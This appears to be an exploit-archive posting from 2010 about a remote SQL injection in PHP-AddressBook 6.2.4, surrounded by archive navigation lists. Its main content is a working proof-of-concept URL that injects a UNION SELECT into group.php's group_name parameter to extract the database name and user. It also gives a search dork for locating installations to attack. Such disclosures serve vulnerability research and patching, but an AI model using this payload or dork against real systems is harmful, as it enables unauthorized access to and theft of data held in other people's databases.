PHP-AddressBook 6.2.4 SQL Injection

PHP-AddressBook 6.2.4 SQL Injection: Posted Dec 29, 2010; Authored by hiphop; PHP-AddressBook version 6.2.4 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, php, sql injection; SHA-256 | 699461b0386c5ae9684e0d4dd201f5c9e12adc221d1fe75c3b3dfb2c36c35b83; Download | Favorite | View

PHP-AddressBook 6.2.4 SQL Injection

#Exploit Title    :  PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script   : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date     : 2010/12/29
#Found    : by hiphop
#thanks :silly3r
 
 
proof of concept:
 
Condition: magic_quotes_gpc = off
 
http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'

Top Authors In Last 30 Days

Red Hat 261 files
Ubuntu 106 files
indoushka 23 files
Debian 20 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 11 files
Mirabbas Agalarov 9 files
Apple 8 files
Ivan Fratric 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,755)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,851)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,365)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,645)
UNIX (9,245)
UnixWare (186)
Windows (6,555)
Other

PHP-AddressBook 6.2.4 SQL Injection

PHP-AddressBook 6.2.4 SQL Injection

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP-AddressBook 6.2.4 SQL Injection

Share This

PHP-AddressBook 6.2.4 SQL Injection

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems